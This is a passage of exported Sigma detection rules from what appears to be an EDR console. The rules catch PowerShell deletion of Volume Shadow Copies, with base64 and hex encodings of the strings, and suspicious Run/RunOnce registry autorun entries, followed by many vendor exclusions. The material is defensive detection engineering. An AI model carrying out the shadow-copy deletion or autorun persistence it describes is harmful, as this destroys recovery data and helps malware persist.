"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070142Z",
"creation_date": "2026-03-23T11:45:34.070145Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070150Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1490/"
],
"name": "t1490_powershell_delete_shadowcopy.yml",
"content": "title: Volume Shadow Copies Deleted via PowerShell\nid: fcd5dfad-3e40-4d1a-9173-728d269423d0\ndescription: |\n Detects an attempt to delete Volume Shadow Copies (VSS) using PowerShell via command-line.\n Attackers often try to delete VSS before encrypting hard drives through ransomwares to prevent data recovery.\n It is recommended to analyze the process responsible for the deletion to look for malicious content and for other actions linked to ransomware activity.\nreferences:\n - https://attack.mitre.org/techniques/T1490/\ndate: 2020/12/10\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1490\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.VolumeShadowCopy\n - classification.Windows.Behavior.Deletion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n selection_clear:\n CommandLine|contains|all:\n - 'Win32_Shadowcopy'\n - '.Delete('\n selection_b64_1:\n CommandLine|contains:\n # Win32_Shadowcopy in UTF16LE and base64 (+ 3 different offsets)\n - 'VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ'\n - 'cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA'\n - 'XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A'\n # Win32_shadowcopy\n - 'VwBpAG4AMwAyAF8AcwBoAGEAZABvAHcAYwBvAHAAeQ'\n - 'cAaQBuADMAMgBfAHMAaABhAGQAbwB3AGMAbwBwAHkA'\n - 'XAGkAbgAzADIAXwBzAGgAYQBkAG8AdwBjAG8AcAB5A'\n # win32_shadowcopy\n - 'dwBpAG4AMwAyAF8AcwBoAGEAZABvAHcAYwBvAHAAeQ'\n #- 'cAaQBuADMAMgBfAHMAaABhAGQAbwB3AGMAbwBwAHkA' # same as for Win32_shadowcopy\n - '3AGkAbgAzADIAXwBzAGgAYQBkAG8AdwBjAG8AcAB5A'\n selection_b64_2:\n CommandLine|contains:\n # .Delete( in UTF16LE and base64 (+ 3 different offsets)\n - 'LgBEAGUAbABlAHQAZQAoA'\n - '4ARABlAGwAZQB0AGUAKA'\n - 'uAEQAZQBsAGUAdABlACgA'\n # .delete(\n - 'LgBkAGUAbABlAHQAZQAoA'\n - '4AZABlAGwAZQB0AGUAKA'\n - 'uAGQAZQBsAGUAdABlACgA'\n selection_hex_1:\n CommandLine|contains:\n # Win32_Shadowcopy\n - '57696E33325F536861646F77636F7079'\n # Win32_shadowcopy\n - '57696E33325F736861646F77636F7079'\n # win32_shadowcopy\n - '77696E33325F736861646F77636F7079'\n selection_hex_2:\n CommandLine|contains:\n # .Delete(\n - '2E44656C65746528'\n # .delete(\n - '2E64656C65746528'\n\n condition: selection and (selection_clear or (all of selection_b64_*) or (all of selection_hex_*))\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fcd5dfad-3e40-4d1a-9173-728d269423d0",
"rule_name": "Volume Shadow Copies Deleted via PowerShell",
"rule_description": "Detects an attempt to delete Volume Shadow Copies (VSS) using PowerShell via command-line.\nAttackers often try to delete VSS before encrypting hard drives through ransomwares to prevent data recovery.\nIt is recommended to analyze the process responsible for the deletion to look for malicious content and for other actions linked to ransomware activity.\n",
"rule_creation_date": "2020-12-10",
"rule_modified_date": "2025-01-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1490"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fd2e4d65-00d6-4661-a5f4-ad92fe8d4540",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620422Z",
"creation_date": "2026-03-23T11:45:34.620424Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620429Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_suspicious_persistence_registry_asep.yml",
"content": "title: Suspicious Registry Autorun Key Added\nid: fd2e4d65-00d6-4661-a5f4-ad92fe8d4540\ndescription: |\n Detects when a suspicious entry is added or modified in one of the autostart extensibility points (ASEP) in the registry, which may indicate an attempt to establish persistence.\n Autostart extensibility points are registry locations that Windows uses to automatically execute programs during system startup or user logon. Common ASEP locations include Run and RunOnce keys under \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" and \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\". Attackers frequently abuse these registry keys to achieve persistence by adding entries that reference malicious executables, scripts, or commands. This technique allows malware to survive system reboots and maintain a foothold on the compromised system without requiring user interaction.\n It is recommended to investigate the process that created or modified the registry key, examine the target executable or command referenced in the registry value and verify whether the entry corresponds to legitimate software.\nreferences:\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2023/06/22\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_key:\n EventType: 'SetValue'\n TargetObject|contains:\n # run keys (run / runonce / runonceex / runservices / runservicesonce )\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\'\n # covers RunOnce and RunOnce\\Setup\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\'\n # covers RunOnceEx\\000x\\value and RunOnceEx\\000x\\Depend\\value\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\'\n\n selection_details:\n - Details|contains:\n - 'rundll32.exe'\n - 'pwsh.exe'\n - 'powershell.exe'\n - 'cmd.exe'\n - 'mshta.exe'\n - 'wscript.exe'\n - 'cscript.exe'\n - '\\AppData\\Roaming\\'\n - '\\Users\\Public\\'\n - '\\Users\\Default\\'\n - '\\PerfLogs\\'\n - Details|endswith:\n # wscript\n - '.js'\n - '.jse'\n - '.vbs'\n - '.vbe'\n - '.vb'\n - '.vba'\n - '.wsf'\n - '.wsh'\n # mshta\n - '.hta'\n # powershell\n - '.ps1'\n - '.psc1'\n - '.psm1'\n - '.psd1'\n # misc, behaves like .exe but uncommon\n - '.cmd'\n - '.com'\n - '.pif'\n - '.scr'\n\n # This is handled by the rule 907e5765-e7f7-4b8f-886c-749bf315fe52\n filter_remote:\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k localService -p -s RemoteRegistry'\n - '?:\\Windows\\system32\\svchost.exe -k LocalService'\n - '?:\\Windows\\system32\\svchost.exe -k regsvc'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n # Exclusion for rundll32.exe\n exclusion_rundll32:\n Details:\n - 'rundll32.exe ?:\\WINDOWS\\system32\\eed_ec.dll,SpeedLauncher'\n - 'Rundll32.exe printui.dll,PrintUIEntry /m ?HP Delivery Driver? /dd /q'\n - 'rundll32.exe ?:\\windows\\system32\\iernonce.dll,RunOnceExProcess'\n - 'RunDll32.exe ??:\\Program Files\\\\*'\n - 'RunDll32.exe ??:\\Program Files (x86)\\\\*'\n\n exclusion_canon:\n # rundll32.exe DR201SVC.dll,EntryPointUserMessage\n # rundll32.exe DRC230SVC.dll, EntryPointUserMessage\n # rundll32.exe P208IISvc.dll, EntryPointUserMessage\n Details: 'rundll32.exe *EntryPointUserMessage'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\CANON *'\n exclusion_wextract:\n Details: 'rundll32.exe ?:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 *'\n TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\wextract_cleanup'\n exclusion_f5:\n Details:\n - 'rundll32.exe ??:\\Windows\\Downloaded Program Files\\urxdialer.dll?,Run /cleanup'\n - 'rundll32.exe ??:\\Windows\\Downloaded Program Files\\\\*\\urxdialer.dll?,Run /cleanup'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\F5 Networks VPN Cleanup {????????-????-????-????-????????????}'\n exclusion_logitech_1:\n ProcessImage: '?:\\Windows\\System32\\drvinst.exe'\n Details: '?:\\Windows\\system32\\rundll32.exe ?:\\Windows\\System32\\LogiLDA.dll,LogiFetch'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Logitech Download Assistant'\n exclusion_fuji:\n ProcessCommandLine|contains:\n - '?:\\Program Files\\Fuji Medical System\\Synapse\\Workstation\\FujiFldL.dll'\n - '?:\\Program Files (x86)\\Fuji Medical System\\Synapse\\Workstation\\FujiFldL.dll'\n Details: 'RUNDLL32.EXE ?:\\PROGRA*\\FUJIME*\\Synapse\\WORKS*\\FujiFldL.dll,ConfigureSynapseUrlSearchHook'\n exclusion_streamci:\n ProcessImage: '?:\\WINDOWS\\servicing\\TrustedInstaller.exe'\n Details: 'rundll32.exe streamci,StreamingDeviceSetup {*},{*},{*}*'\n\n # Exclusion for cmd.exe\n exclusion_uninstall:\n Details: '?:\\windows\\system32\\cmd.exe /q /c rmdir /s /q *'\n TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Uninstall '\n exclusion_delete:\n Details: '?:\\Windows\\system32\\cmd.exe /q /c del /q *'\n TargetObject|contains:\n - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Update Binary'\n - '\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Update Binary'\n - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Standalone Update Binary'\n - '\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Standalone Update Binary'\n exclusion_msiexec:\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\msiexec.exe /V'\n - '?:\\Windows\\System32\\MsiExec.exe -Embedding *'\n TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\'\n exclusion_nch:\n Details: 'cmd.exe /C rmdir *\\AppData\\Roaming\\NCH Software*'\n TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ExpressZipUninstall'\n exclusion_sophos:\n ProcessSigned: 'true'\n ProcessSignature: 'Sophos Ltd'\n Details: 'cmd.exe /c IF EXIST ??:\\Program Files (x86)\\Sophos\\AutoUpdate\\SophosAlert.exe? start ?Sophos? /B ??:\\Program Files (x86)\\Sophos\\AutoUpdate\\SophosAlert.exe?'\n TargetObject: 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\SophosAlert'\n exclusion_softmon:\n ProcessImage: '?:\\Program Files (x86)\\LANDesk\\LDClient\\SoftMon.exe'\n Details:\n - '??:\\Program Files (x86)\\LANDesk\\LDClient\\softmon.exe? /r ?:\\windows\\system32\\cmd.exe /q /c del *'\n - '??:\\Program Files (x86)\\LANDesk\\LDClient\\softmon.exe? /r ?:\\windows\\system32\\cmd.exe /q /c rmdir *'\n TargetObject:\n - '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Uninstall *'\n - '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete *'\n exclusion_bomgar:\n Details:\n - 'cmd.exe /C rd /S /Q * & reg.exe delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Bomgar_Cleanup_* /f'\n - 'cmd.exe /C del /Q * & reg.exe delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Bomgar_Cleanup_* /f'\n - 'cmd.exe /C del /Q * & wmic.exe /NAMESPACE:\\\\root\\default Class StdRegProv Call DeleteValue hDefKey=* sSubKeyName=?Software\\Microsoft\\Windows\\CurrentVersion\\Run? sValueName=?Bomgar_Cleanup_*'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Bomgar_Cleanup_*'\n exclusion_ldmsremovetempdir:\n Details:\n - 'cmd.exe /C RD /S /Q ?:\\Users\\\\*\\AppData\\Local\\Temp\\$LDTmp$'\n - 'cmd.exe /C RD /S /Q ?:\\WINDOWS\\TEMP\\$LDTmp$'\n TargetObject: '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\LdmsRemoveTempDir'\n exclusion_mcafee:\n Details:\n - 'cmd.exe /C rmdir /s /q ??:\\ProgramData\\McAfee\\Endpoint Security?'\n - 'cmd.exe /C rmdir /s /q ??:\\Program Files (x86)\\McAfee\\Endpoint Security\\\\?'\n - 'cmd.exe /C rmdir /s /q ??:\\ProgramData\\McAfee\\Solidcore?'\n - 'cmd.exe /C rmdir /s /q ??:\\Program Files\\McAfee\\Solidcore?'\n TargetObject|endswith:\n - '\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\EPR_ENS_?'\n - '\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\EPR_MACC_?'\n exclusion_citrix:\n Details: 'PowerShell.exe -WindowStyle hidden -Command \"(Get-Item HKCU:\\Software\\Citrix\\UserProfileManager\\RegUwpApps).Property|%{Get-ItemPropertyValue HKCU:\\Software\\Citrix\\UserProfileManager\\RegUwpApps -name $_}|%{Add-AppxPackage -Register $_ -DisableDevelopmentMode}\"'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\RegisterUwpApps'\n exclusion_citrix_userprofilemanager:\n ProcessImage: '?:\\Program Files\\Citrix\\User Profile Manager\\UserProfileManager.exe'\n exclusion_hp:\n Details: 'cmd.exe /c ?manage-bde.exe -resume C:?'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Resume-bde-C'\n\n # Exclusion for wscript.exe\n exclusion_kaspersky:\n ProcessImage: '?:\\Windows\\SysWOW64\\regedit.exe'\n Details: 'wscript.exe //b ?:\\\\*\\UnKES.vbs'\n TargetObject: 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\UnKES'\n exclusion_appremover:\n ProcessImage|endswith: '\\rm.exe'\n Details:\n - 'wscript.exe *\\Temp\\AppRemover_RunBatchSilently.vbs*\\TEMP\\AppRemover_ToBeDelAfterReboot.bat'\n - 'wscript.exe *\\Temp\\AppRemover_RunBatchSilently.vbs*\\TEMP\\AppRemover_ToBeDelAfterReboot.bat?'\n TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\AppRemover'\n exclusion_litetouch:\n Details: 'wscript.exe ??:\\MININT\\Scripts\\LiteTouch.wsf?'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\LiteTouch'\n\n # Exclusion for \\AppData\\Roaming\\\n exclusion_ISI-Com:\n Details|endswith: '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\ISI-Com\\ISIPCB.appref-ms'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ISIPCB'\n exclusion_myistra:\n # \\AppData\\Roaming\\Mediacom\\myIstra\\Bin\\myIstra.exe\n ProcessImage|endswith: '\\Bin\\myIstra.exe'\n Details|contains:\n - '\\AppData\\Roaming\\Mediacom\\myIstra\\Bin\\myIstra.exe'\n - '\\AppData\\Roaming\\Adista\\myIstra\\Bin\\myIstra.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\myIstra'\n exclusion_secureexchanges:\n # https://www.secure-exchanges.com/Home.aspx\n Details|endswith:\n - '\\AppData\\Roaming\\SecureExchanges\\SEWD\\900?_SEWD.exe\"'\n - '\\AppData\\Roaming\\SecureExchanges\\SEWD\\900?_SEWD.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SecureExchanges'\n exclusion_webcompanion:\n # Here, we use \"contains\" instead of \"endswith\" because there may be some spaces at the end\n Details|contains: '\\AppData\\Roaming\\Lavasoft\\Web Companion\\Application\\WebCompanion.exe --minimize'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Web Companion'\n exclusion_moveslink2:\n # Suunto device\n Details|endswith: '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Suunto\\Moveslink2.appref-ms -auto'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Moveslink2'\n exclusion_ixbus:\n Details|endswith: '\\AppData\\Roaming\\SRCI\\iXBus Websocket\\iXBus WebSocket.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\iXBus WebSocket'\n exclusion_yealink:\n Details|endswith: '\\AppData\\Roaming\\Yealink\\Yealink Wireless Presentation Pod\\app\\PresentationLauncher.exe sys'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\StartLoad'\n exclusion_cisco_1:\n Details|endswith:\n - '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Webex\\Webex.lnk /minimized /autostartedWithWindows=true'\n - '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Webex\\Webex.lnk? /minimized /autostartedWithWindows=true'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\CiscoSpark'\n exclusion_zoom:\n ProcessSigned: 'true'\n ProcessSignature: 'Zoom Video Communications, Inc.'\n Details:\n - '??:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\Zoom.exe? --background=true'\n - '??:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\Zoom.exe?'\n exclusion_adobe:\n ProcessImage:\n - '*\\Adobe\\AdobeConnect\\Installer\\ConnectAppSetup.exe'\n - '*\\Adobe\\Adobe Connect\\ConnectAppSetup.exe'\n - '*\\Sources\\SetupHost.exe'\n - '?:\\Windows\\System32\\msiexec.exe'\n Details:\n - '??:\\Users\\\\*\\AppData\\Roaming\\Adobe\\Connect\\connectdetector.exe?'\n - '??:\\windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Adobe\\Connect\\connectdetector.exe?'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ConnectDetector'\n exclusion_adobe_2:\n ProcessSigned: 'true'\n ProcessOriginalFileName: 'ConnectAppSetup.exe'\n Details:\n - '??:\\Users\\\\*\\AppData\\Roaming\\Adobe\\Connect\\connectdetector.exe?'\n - '??:\\windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Adobe\\Connect\\connectdetector.exe?'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ConnectDetector'\n exclusion_adobe_3:\n ProcessSigned: 'true'\n ProcessOriginalFileName: 'msiexec.exe'\n Details: '??:\\windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Adobe\\Connect\\connectdetector.exe?'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ConnectDetector'\n exclusion_exclaimer:\n # C:\\Program Files (x86)\\Exclaimer Ltd\\Cloud Signature Update Agent\\Exclaimer.CloudSignatureAgent.exe\n ProcessImage|endswith: '\\Exclaimer.CloudSignatureAgent.exe'\n Details: '??:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Exclaimer Ltd\\Exclaimer Cloud Signature Update Agent.appref-ms?'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Exclaimer Cloud Signature Update Agent'\n exclusion_restart:\n ProcessImage: '?:\\Windows\\System32\\csrss.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Application Restart #?'\n exclusion_spotify:\n - ProcessImage|endswith: '\\AppData\\Roaming\\Spotify\\Spotify.exe'\n Details|endswith:\n - '\\AppData\\Roaming\\Spotify\\Spotify.exe --autostart'\n - '\\AppData\\Roaming\\Spotify\\Spotify.exe --autostart --minimized'\n - '\\AppData\\Roaming\\Spotify\\SpotifyLauncher.exe --autostart'\n TargetObject|endswith:\n - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Spotify'\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SpotifyLauncher'\n - ProcessImage|endswith: '\\Sources\\SetupHost.exe'\n ProcessSigned: 'true'\n Details|endswith: '\\AppData\\Roaming\\Spotify\\Spotify.exe --autostart --minimized'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Spotify'\n exclusion_cacaoweb:\n Details|endswith: '\\AppData\\Roaming\\cacaoweb\\cacaoweb.exe? -noplayer'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\cacaoweb'\n exclusion_systevo:\n Details: '?:\\Users\\\\*\\AppData\\Roaming\\INSTAL~*\\{*\\setup.exe -reboot?:\\Users\\\\*\\AppData\\Roaming\\INSTAL~*\\{*\\reboot.ini*'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Runonce\\InstallShieldSetup'\n exclusion_movavi_helper:\n Details: '?:\\Users\\\\*\\AppData\\Roaming\\MovaviHelper\\MovaviHelper.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Movavi_MovaviHelper'\n\n # Exclusion for \\Users\\Public\\\n exclusion_norton:\n Details: '?:\\Users\\Public\\Downloads\\Norton\\{??????????-????-????????}\\FSDUI_Custom.exe /m /SHOWONECLICK /WIN10_UPGRADE ??:\\Users\\\\*\\AppData\\Local\\Temp\\{????????-????-????-????-????????????}\\Upgrade.exe?'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Norton Download Manager{??????????-????-????????}'\n\n # Exclusion for \\Users\\Default\\\n exclusion_clickshare:\n # C:\\Users\\Default\\AppData\\Local\\ClickShare\\current\\ClickShare.exe\n ProcessSigned: 'true'\n ProcessSignature: 'Barco N.V.'\n Details: '?:\\Users\\Default\\AppData\\Local\\ClickShare\\ClickShare.exe --minimized'\n TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\Run\\ClickShare'\n\n exclusion_movavi_video_suite:\n # C:\\Users\\xxxx\\AppData\\Roaming\\Movavi Video Suite 22\\AgentInformer.exe\n # C:\\Users\\xxxxx\\AppData\\Local\\Temp\\Movavi-installer-73a268c0-f514-4f37-9c8e-2dd2df2c05aa\\InstallerGUI.exe\n Image|endswith:\n - '\\AgentInformer.exe'\n - '\\InstallerGUI.exe'\n ProcessSignature: 'Movavi Software Limited'\n TargetObject|endswith:\n - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\movavi_suite_agent'\n - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\movavi_suiteplatform_agent'\n Details|contains: '\\AgentInformer.exe'\n\n exclusion_windows_update:\n ProcessImage:\n - '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\setupplatform.exe'\n\n exclusion_copernic:\n Details|startswith: '?:\\Users\\\\*\\AppData\\Roaming\\\\*\\Copernic\\start_copernic.cmd'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Copernic'\n\n exclusion_utorrent:\n TargetObject|endswith:\n - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\uTorrent'\n - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ut' # seen from 2021 ?\n Details|contains: 'AppData\\Roaming\\uTorrent\\uTorrent.exe'\n\n exclusion_archicad:\n ProcessParentImage|endswith: '\\ARCHICAD-??-Update-????-?.?.exe'\n Details|startswith: 'cmd.exe /C del '\n\n exclusion_wiseguard:\n Details|contains: 'cmd.exe /c REG DELETE HKLM\\SOFTWARE\\Enatel\\WiseGuard\\AdvancedLogin /v DontRestartSecurityServices /f'\n\n exclusion_bitorrent:\n Details|contains:\n - '?:\\Users\\\\*\\AppData\\Roaming\\bittorrent\\BitTorrent.exe* /MINIMIZED'\n - '?:\\Users\\\\*\\AppData\\Roaming\\BitTorrent Web\\btweb.exe* /MINIMIZED'\n\n exclusion_plustek:\n Details|contains:\n - 'CMD.EXE /C DEL /Q *?:\\Program Files (x86)\\Plustek\\Plustek SmartOffice*\\ScanAdvanced.dll*'\n - 'CMD.EXE /C REN *?:\\Program Files (x86)\\Plustek\\Plustek SmartOffice *\\ScanAdvanced.dll.new* *ScanAdvanced.dll*'\n\n exclusion_honeywell:\n Details|contains: 'cmd.exe /c regsvr32 /s *?:\\Program Files (x86)\\Honeywell\\client\\station\\components\\hscPointBrowseDialog.exe*'\n\n exclusion_nchsoftware:\n Details|contains:\n - 'cmd.exe /C rmdir /Q *?:\\Program Files (x86)\\NCH Software\\ExpressZip*'\n - 'cmd.exe /C rmdir /S /Q *?:\\Program Files (x86)\\NCH Software\\ExpressZip*'\n\n exclusion_nomachine:\n Details|contains: 'cmd.exe /c *rmdir /S /Q *?:\\Program Files (x86)\\NoMachine*'\n\n exclusion_movavi:\n Details|contains:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Movavi Suite\\MovaviSuite.exe* --silent-platform-mode-enabled'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Movavi Video Converter\\ConverterAgent.exe'\n\n exclusion_cisco_2:\n Details|contains: '?:\\Users\\\\*\\AppData\\Roaming\\Cisco\\Proximity\\proximity.exe* --autostart'\n\n exclusion_fiery:\n Details|contains:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Fiery Software Manager\\fsm_reboot.bat'\n - 'rundll32.exe ?:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"?:\\VCREDI?\\\"'\n\n exclusion_weadvocacy:\n Details|contains: '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\we advocacy\\we advocacy\\we advocacy.appref-ms'\n\n exclusion_hubspot:\n Details|contains: '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Hubspot\\HubSpot for Windows.appref-ms'\n\n exclusion_penumbra:\n Details|contains: '?:\\Users\\\\*\\AppData\\Roaming\\Penumbra\\Penumbra.exe'\n\n exclusion_miteldialer:\n Details|contains:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Mitel\\MitelDialer\\MitelDialer.exe? -s'\n - '?:\\WINDOWS\\system32\\config\\systemprofile\\AppData\\Roaming\\Mitel\\MitelDialer\\MitelDialer.exe? -s'\n\n exclusion_svgviewer:\n Details|contains:\n - '?:\\windows\\system32\\cmd.exe /D /Q /C del /F /Q *?:\\Program Files (x86)\\Common Files\\Adobe\\SVG Viewer 3.0\\FileOps.exe*'\n - '?:\\windows\\system32\\cmd.exe /D /Q /C rd /S /Q *?:\\Program Files (x86)\\Common Files\\Adobe\\SVG Viewer 3.0*'\n\n exclusion_prtgnetworkmonitor:\n Details|contains: '?:\\Windows\\System32\\cmd.exe /q/c RMDIR /S/Q *?:\\Program Files (x86)\\PRTG Network Monitor*'\n\n exclusion_logitech_2:\n Details|contains: '?:\\Windows\\system32\\rundll32.exe ?:\\Windows\\System32\\LogiLDA.dll,LogiFetch'\n\n 